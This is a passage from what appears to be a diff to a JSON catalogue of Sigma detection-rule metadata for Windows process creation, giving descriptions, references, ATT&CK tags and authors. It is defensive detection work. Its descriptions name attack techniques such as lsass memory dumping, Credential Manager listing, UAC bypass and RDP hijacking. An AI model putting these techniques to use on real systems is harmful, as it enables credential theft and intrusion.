"proc_creation_win_susp_svchost_no_cli.yml", + "author": "David Burkett", + "level": "high", + "falsepositive": [ + "Rpcnet.exe / rpcnetp.exe which is a lojack style software. https://www.blackhat.com/docs/us-14/materials/us-14-Kamlyuk-Kamluk-Computrace-Backdoor-Revisited.pdf" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious sysprep process start with AppData folder as target (as used by Trojan Syndicasec in Thrip report by Symantec)", + "uuid": "d5b9ae7a-e6fc-405e-80ff-2ff9dcc64e7e", + "value": "Sysprep on AppData Folder", + "meta": { + "refs": [ + "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets", + "https://app.any.run/tasks/61a296bb-81ad-4fee-955f-3b399f4aaf4b", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_sysprep_appdata.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ], + "creation_date": "2018/06/22", + "filename": "proc_creation_win_susp_sysprep_appdata.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "False positives depend on scripts and administrative tools used in the monitored environment" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects usage of the \"systeminfo\" command to retrieve information", + "uuid": "0ef56343-059e-4cb6-adc1-4c3c967c5e46", + "value": "Suspicious Execution of Systeminfo", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md#atomic-test-1---system-information-discovery", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/systeminfo", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_systeminfo.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1082" + ], + "creation_date": "2022/01/01", + "filename": "proc_creation_win_susp_systeminfo.yml", + "author": "frack113", + "level": "low", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a suspicious process creation as SYSTEM user (suspicious program or command line parameter)", + "uuid": "2617e7ed-adb7-40ba-b0f3-8f9945fe6c09", + "value": "Suspicious SYSTEM User Process Creation", + "meta": { + "refs": [ + "Internal Research", + "https://tools.thehacker.recipes/mimikatz/modules", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_system_user_anomaly.yml" + ], + "tags": "No established tags", + "creation_date": "2021/12/20", + "filename": "proc_creation_win_susp_system_user_anomaly.yml", + "author": "Florian Roth (rule), David ANDRE (additional keywords)", + "level": "high", + "falsepositive": [ + "Administrative activity", + "Scripts and administrative tools used in the monitored environment", + "Monitoring activity" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects Access to Domain Group Policies stored in SYSVOL", + "uuid": "05f3c945-dcc8-4393-9f3d-af65077a8f86", + "value": "Suspicious SYSVOL Domain Group Policy Access", + "meta": { + "refs": [ + "https://adsecurity.org/?p=2288", + "https://www.hybrid-analysis.com/sample/f2943f5e45befa52fb12748ca7171d30096e1d4fc3c365561497c618341299d5?environmentId=100", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_sysvol_access.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1552.006" + ], + "creation_date": "2018/04/09", + "filename": "proc_creation_win_susp_sysvol_access.yml", + "author": "Markus Neis, Jonhnathan Ribeiro, oscd.community", + "level": "medium", + "falsepositive": [ + "Administrative activity" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries can interact with the DACLs using built-in Windows commands takeown which can grant adversaries higher permissions on specific files and folders", + "uuid": "554601fb-9b71-4bcc-abf4-21a611be4fde", + "value": "Suspicious Recursive Takeown", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/takeown", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.001/T1222.001.md#atomic-test-1---take-ownership-using-takeown-utility", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_takeown.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1222.001" + ], + "creation_date": "2022/01/30", + "filename": "proc_creation_win_susp_takeown.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Scripts created by developers and admins", + "Administrative activity" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects shell32.dll executing a DLL in a suspicious directory", + "uuid": "32b96012-7892-429e-b26c-ac2bf46066ff", + "value": "Shell32 DLL Execution in Suspicious Directory", + "meta": { + "refs": [ + "https://www.group-ib.com/resources/threat-research/red-curl-2.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_target_location_shell32.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1218.011" + ], + "creation_date": "2021/11/24", + "filename": "proc_creation_win_susp_target_location_shell32.yml", + "author": "Christian Burkard", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may stop services or processes in order to conduct Data Destruction or Data Encrypted for Impact on the data stores of services like Exchange and SQL Server.", + "uuid": "86085955-ea48-42a2-9dd3-85d4c36b167d", + "value": "Suspicious Execution of Taskkill", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1489/T1489.md#atomic-test-3---windows---stop-service-by-killing-process", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_taskkill.yml" + ], + "tags": [ + "attack.impact", + "attack.t1489" + ], + "creation_date": "2021/12/26", + "filename": "proc_creation_win_susp_taskkill.yml", + "author": "frack113", + "level": "low", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network", + "uuid": "63332011-f057-496c-ad8d-d2b6afb27f96", + "value": "Suspicious Tasklist Discovery Command", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1057/T1057.md#atomic-test-2---process-discovery---tasklist", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_tasklist_command.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1057" + ], + "creation_date": "2021/12/11", + "filename": "proc_creation_win_susp_tasklist_command.yml", + "author": "frack113", + "level": "low", + "falsepositive": [ + "Administrator, hotline ask to user" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the creation of taskmgr.exe process in context of LOCAL_SYSTEM", + "uuid": "9fff585c-c33e-4a86-b3cd-39312079a65f", + "value": "Taskmgr as LOCAL_SYSTEM", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_taskmgr_localsystem.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036" + ], + "creation_date": "2018/03/18", + "filename": "proc_creation_win_susp_taskmgr_localsystem.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the creation of a process from Windows task manager", + "uuid": "3d7679bd-0c00-440c-97b0-3f204273e6c7", + "value": "Taskmgr as Parent", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_taskmgr_parent.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036" + ], + "creation_date": "2018/03/13", + "filename": "proc_creation_win_susp_taskmgr_parent.yml", + "author": "Florian Roth", + "level": "low", + "falsepositive": [ + "Administrative activity" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "This rule detects DLL injection and execution via LOLBAS - Tracker.exe", + "uuid": "148431ce-4b70-403d-8525-fcc2993f29ea", + "value": "DLL Injection with Tracker.exe", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Tracker/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_tracker_execution.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1055.001" + ], + "creation_date": "2020/10/18", + "filename": "proc_creation_win_susp_tracker_execution.yml", + "author": "Avneet Singh @v3t0_, oscd.community", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a possible process memory dump that uses the white-listed Citrix TrolleyExpress.exe filename as a way to dump the lsass process memory", + "uuid": "4c0aaedc-154c-4427-ada0-d80ef9c9deb6", + "value": "Process Access via TrolleyExpress Exclusion", + "meta": { + "refs": [ + "https://twitter.com/_xpn_/status/1491557187168178176", + "https://www.youtube.com/watch?v=Ie831jF0bb0", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_trolleyexpress_procdump.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.011", + "attack.credential_access", + "attack.t1003.001" + ], + "creation_date": "2022/02/10", + "filename": "proc_creation_win_susp_trolleyexpress_procdump.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a tscon.exe start as LOCAL SYSTEM", + "uuid": "9847f263-4a81-424f-970c-875dab15b79b", + "value": "Suspicious TSCON Start as SYSTEM", + "meta": { + "refs": [ + "http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html", + "https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6", + "https://www.ired.team/offensive-security/lateral-movement/t1076-rdp-hijacking-for-lateral-movement", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_tscon_localsystem.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ], + "creation_date": "2018/03/17", + "filename": "proc_creation_win_susp_tscon_localsystem.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a suspicious RDP session redirect using tscon.exe", + "uuid": "f72aa3e8-49f9-4c7d-bd74-f8ab84ff9bbb", + "value": "Suspicious RDP Redirect Using TSCON", + "meta": { + "refs": [ + "http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html", + "https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_tscon_rdp_redirect.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1563.002", + "attack.t1021.001", + "car.2013-07-002" + ], + "creation_date": "2018/03/17", + "filename": "proc_creation_win_susp_tscon_rdp_redirect.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects indicators of a UAC bypass method by mocking directories", + "uuid": "4ac47ed3-44c2-4b1f-9d51-bf46e8914126", + "value": "TrustedPath UAC Bypass Pattern", + "meta": { + "refs": [ + "https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e", + "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", + "https://github.com/netero1010/TrustedPath-UACBypass-BOF", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_uac_bypass_trustedpath.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1548.002" + ], + "creation_date": "2021/08/27", + "filename": "proc_creation_win_susp_uac_bypass_trustedpath.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a suspicious child process of userinit", + "uuid": "b655a06a-31c0-477a-95c2-3726b83d649d", + "value": "Suspicious Userinit Child Process", + "meta": { + "refs": [ + "https://twitter.com/SBousseaden/status/1139811587760562176", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_userinit_child.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1055" + ], + "creation_date": "2019/06/17", + "filename": "proc_creation_win_susp_userinit_child.yml", + "author": "Florian Roth (rule), Samir Bousseaden (idea)", + "level": "medium", + "falsepositive": [ + "Administrative scripts" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the execution of CSharp interactive console by PowerShell", + "uuid": "a9e416a8-e613-4f8b-88b8-a7d1d1af2f61", + "value": "Suspicious Use of CSharp Interactive Console", + "meta": { + "refs": [ + "https://redcanary.com/blog/detecting-attacks-leveraging-the-net-framework/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_use_of_csharp_console.yml" + ], + "tags": [ + "attack.execution", + "attack.t1127" + ], + "creation_date": "2020/03/08", + "filename": "proc_creation_win_susp_use_of_csharp_console.yml", + "author": "Michael R. (@nahamike01)", + "level": "high", + "falsepositive": [ + "Possible depending on environment. Pair with other factors such as net connections, command-line args, etc." + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "This rule detects execution of a PowerShell code through the sqlps.exe utility, which is included in the standard set of utilities supplied with the MSSQL Server.\nScript blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.\n", + "uuid": "0152550d-3a26-4efd-9f0e-54a0b28ae2f3", + "value": "Detection of PowerShell Execution via Sqlps.exe", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/sql/tools/sqlps-utility?view=sql-server-ver15", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqlps/", + "https://twitter.com/bryon_/status/975835709587075072", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_use_of_sqlps_bin.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1127" + ], + "creation_date": "2020/10/10", + "filename": "proc_creation_win_susp_use_of_sqlps_bin.yml", + "author": "Agro (@agro_sev) oscd.community", + "level": "medium", + "falsepositive": [ + "Direct PS command execution through SQLPS.exe is uncommon, childprocess sqlps.exe spawned by sqlagent.exe is a legitimate action." + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "This rule detects execution of a PowerShell code through the sqltoolsps.exe utility, which is included in the standard set of utilities supplied with the Microsoft SQL Server Management studio.\nScript blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.\n", + "uuid": "a746c9b8-a2fb-4ee5-a428-92bee9e99060", + "value": "SQL Client Tools PowerShell Session Detection", + "meta": { + "refs": [ + "https://github.com/LOLBAS-Project/LOLBAS/blob/8283d8d91552213ded165fd36deb6cb9534cb443/yml/OtherMSBinaries/Sqltoolsps.yml", + "https://twitter.com/pabraeken/status/993298228840992768", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_use_of_sqltoolsps_bin.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1127" + ], + "creation_date": "2020/10/13", + "filename": "proc_creation_win_susp_use_of_sqltoolsps_bin.yml", + "author": "Agro (@agro_sev) oscd.communitly", + "level": "medium", + "falsepositive": [ + "Direct PS command execution through SQLToolsPS.exe is uncommon, childprocess sqltoolsps.exe spawned by smss.exe is a legitimate action." + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Windows Test Authoring and Execution Framework (TAEF) framework allows you to run automation by executing tests files written on different languages (C, C#, Microsoft COM Scripting interfaces\nAdversaries may execute malicious code (such as WSC file with VBScript, dll and so on) directly by running te.exe\n", + "uuid": "634b00d5-ccc3-4a06-ae3b-0ec8444dd51b", + "value": "Malicious Windows Script Components File Execution by TAEF Detection", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Te/", + "https://twitter.com/pabraeken/status/993298228840992768", + "https://docs.microsoft.com/en-us/windows-hardware/drivers/taef/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_use_of_te_bin.yml" + ], + "tags": [ + "attack.t1218" + ], + "creation_date": "2020/10/13", + "filename": "proc_creation_win_susp_use_of_te_bin.yml", + "author": "Agro (@agro_sev) oscd.community", + "level": "low", + "falsepositive": [ + "It's not an uncommon to use te.exe directly to execute legal TAEF tests" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "There is an option for a MS VS Just-In-Time Debugger \"vsjitdebugger.exe\" to launch specified executable and attach a debugger.\nThis option may be used adversaries to execute malicious code by signed verified binary.\nThe debugger is installed alongside with Microsoft Visual Studio package.\n", + "uuid": "15c7904e-6ad1-4a45-9b46-5fb25df37fd2", + "value": "Malicious PE Execution by Microsoft Visual Studio Debugger", + "meta": { + "refs": [ + "https://twitter.com/pabraeken/status/990758590020452353", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Vsjitdebugger/", + "https://docs.microsoft.com/en-us/visualstudio/debugger/debug-using-the-just-in-time-debugger?view=vs-2019", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_use_of_vsjitdebugger_bin.yml" + ], + "tags": [ + "attack.t1218", + "attack.defense_evasion" + ], + "creation_date": "2020/10/14", + "filename": "proc_creation_win_susp_use_of_vsjitdebugger_bin.yml", + "author": "Agro (@agro_sev), Ensar \u015eamil (@sblmsrsn), oscd.community", + "level": "medium", + "falsepositive": [ + "The process spawned by vsjitdebugger.exe is uncommon." + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "List credentials currently stored in Windows Credential Manager via the native Windows utility vaultcmd.exe", + "uuid": "58f50261-c53b-4c88-bd12-1d71f12eda4c", + "value": "Windows Credential Manager Access via VaultCmd", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.004/T1555.004.md#atomic-test-1---access-saved-credentials-via-vaultcmd", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_vaultcmd.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1555.004" + ], + "creation_date": "2022/04/08", + "filename": "proc_creation_win_susp_vaultcmd.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detect VBoxDrvInst.exe run with parameters allowing processing INF file.\nThis allows to create values in the registry and install drivers.\nFor example one could use this technique to obtain persistence via modifying one of Run or RunOnce registry keys\n", + "uuid": "b7b19cb6-9b32-4fc4-a108-73f19acfe262", + "value": "Suspicious VBoxDrvInst.exe Parameters", + "meta": { + "refs": [ + "https://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OtherBinaries/VBoxDrvInst.yml", + "https://twitter.com/pabraeken/status/993497996179492864", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_vboxdrvinst.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ], + "creation_date": "2020/10/06", + "filename": "proc_creation_win_susp_vboxdrvinst.yml", + "author": "Konstantin Grishchenko, oscd.community", + "level": "medium", + "falsepositive": [ + "Legitimate use of VBoxDrvInst.exe utility by VirtualBox Guest Additions installation process" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious inline VBScript keywords as used by UNC2452", + "uuid": "20c3f09d-c53d-4e85-8b74-6aa50e2f1b61", + "value": "Suspicious VBScript UN2452 Pattern", + "meta": { + "refs": [ + "https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_vbscript_unc2452.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ], + "creation_date": "2021/03/05", + "filename": "proc_creation_win_susp_vbscript_unc2452.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects commands that temporarily turn off Volume Snapshots", + "uuid": "dee4af55-1f22-4e1d-a9d2-4bdc7ecb472a", + "value": "Disabled Volume Snapshots", + "meta": { + "refs": [ + "https://twitter.com/0gtweet/status/1354766164166115331", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_volsnap_disable.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "creation_date": "2021/01/28", + "filename": "proc_creation_win_susp_volsnap_disable.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Legitimate administration" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects Microsoft Visual Studio vsls-agent.exe lolbin execution with a suspicious library load using the --agentExtensionPath parameter", + "uuid": "43103702-5886-11ed-9b6a-0242ac120002", + "value": "Suspicious Vsls-Agent Command With AgentExtensionPath Load", + "meta": { + "refs": [ + "https://twitter.com/bohops/status/1583916360404729857", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_vslsagent_agentextensionpath_load.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ], + "creation_date": "2022/10/30", + "filename": "proc_creation_win_susp_vslsagent_agentextensionpath_load.yml", + "author": "bohops", + "level": "medium", + "falsepositive": [ + "False positives depend on custom use of vsls-agent.exe" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "A General detection for svchost.exe spawning rundll32.exe with command arguments like C:\\windows\\system32\\davclnt.dll,DavSetCookie.\nThis could be an indicator of exfiltration or use of WebDav to launch code (hosted on WebDav Server).\n", + "uuid": "2dbd9d3d-9e27-42a8-b8df-f13825c6c3d5", + "value": "Suspicious WebDav Client Execution", + "meta": { + "refs": [ + "https://github.com/OTRF/detection-hackathon-apt29/issues/17", + "https://threathunterplaybook.com/evals/apt29/detections/7.B.4_C10730EA-6345-4934-AA0F-B0EFCA0C4BA6.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_webdav_client_execution.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1048.003" + ], + "creation_date": "2020/05/02", + "filename": "proc_creation_win_susp_webdav_client_execution.yml", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious child processes of SysAidServer (as seen in MERCURY threat actor intrusions)", + "uuid": "60bfeac3-0d35-4302-8efb-1dd16f715bc6", + "value": "Suspicious SysAidServer Child", + "meta": { + "refs": [ + "https://www.microsoft.com/security/blog/2022/08/25/mercury-leveraging-log4j-2-vulnerabilities-in-unpatched-systems-to-target-israeli-organizations/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_web_sysaidserver.yml" + ], + "tags": "No established tags", + "creation_date": "2022/08/26", + "filename": "proc_creation_win_susp_web_sysaidserver.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious Windows Error Reporting manager (wermgr.exe) process patterns - suspicious parents / children, execution folders, command lines etc.", + "uuid": "396f6630-f3ac-44e3-bfc8-1b161bc00c4e", + "value": "Suspicious WERMGR Process Patterns", + "meta": { + "refs": [ + "https://www.trendmicro.com/en_us/research/22/j/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html", + "https://www.echotrail.io/insights/search/wermgr.exe", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_wermgr.yml" + ], + "tags": "No established tags", + "creation_date": "2022/10/14", + "filename": "proc_creation_win_susp_wermgr.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may enumerate browser bookmarks to learn more about compromised hosts.\nBrowser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about\ninternal network resources such as servers, tools/dashboards, or other related infrastructure.\n", + "uuid": "725a9768-0f5e-4cb3-aec2-bc5719c6831a", + "value": "Suspicious Where Execution", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1217/T1217.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_where_execution.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1217" + ], + "creation_date": "2021/12/13", + "filename": "proc_creation_win_susp_where_execution.yml", + "author": "frack113, Nasreddine Bencherchali", + "level": "low", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the execution of whoami, which is often used by attackers after exploitation / privilege escalation but rarely used by administrators", + "uuid": "e28a5a99-da44-436d-b7a0-2afc20a5f413", + "value": "Whoami Execution", + "meta": { + "refs": [ + "https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/", + "https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_whoami.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1033", + "car.2016-03-001" + ], + "creation_date": "2018/08/13", + "filename": "proc_creation_win_susp_whoami.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "Admin activity", + "Scripts and administrative tools used in the monitored environment", + "Monitoring activity" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the execution of whoami with suspicious parents or parameters", + "uuid": "8de1cbe8-d6f5-496d-8237-5f44a721c7a0", + "value": "Whoami Execution Anomaly", + "meta": { + "refs": [ + "https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/", + "https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/", + "https://www.youtube.com/watch?v=DsJ9ByX84o4&t=6s", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_whoami_anomaly.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1033", + "car.2016-03-001" + ], + "creation_date": "2021/08/12", + "filename": "proc_creation_win_susp_whoami_anomaly.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Admin activity", + "Scripts and administrative tools used in the monitored environment", + "Monitoring activity" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a suspicious process command line that uses whoami as first parameter (as e.g. used by EfsPotato)", + "uuid": "e9142d84-fbe0-401d-ac50-3e519fb00c89", + "value": "WhoAmI as Parameter", + "meta": { + "refs": [ + "https://twitter.com/blackarrowsec/status/1463805700602224645?s=12", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_whoami_as_param.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1033", + "car.2016-03-001" + ], + "creation_date": "2021/11/29", + "filename": "proc_creation_win_susp_whoami_as_param.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a suspicious winrar execution that involves a file with a .dmp extension, which could be a step in a process of dump file exfiltration", + "uuid": "1ac14d38-3dfc-4635-92c7-e3fd1c5f5bfc", + "value": "Winrar Compressing Dump Files", + "meta": { + "refs": [ + "https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_winrar_dmp.yml" + ], + "tags": [ + "attack.collection", + "attack.t1560.001" + ], + "creation_date": "2022/01/04", + "filename": "proc_creation_win_susp_winrar_dmp.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Legitimate use of WinRAR with a command line in which .dmp appears accidentally" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a suspicious winrar execution in a folder which is not the default installation folder", + "uuid": "4ede543c-e098-43d9-a28f-dd784a13132f", + "value": "Winrar Execution in Non-Standard Folder", + "meta": { + "refs": [ + "https://twitter.com/cyb3rops/status/1460978167628406785", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_winrar_execution.yml" + ], + "tags": [ + "attack.collection", + "attack.t1560.001" + ], + "creation_date": "2021/11/17", + "filename": "proc_creation_win_susp_winrar_execution.yml", + "author": "Florian Roth, Tigzy", + "level": "high", + "falsepositive": [ + "Legitimate use of WinRAR in a folder of a software that bundles WinRAR" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects 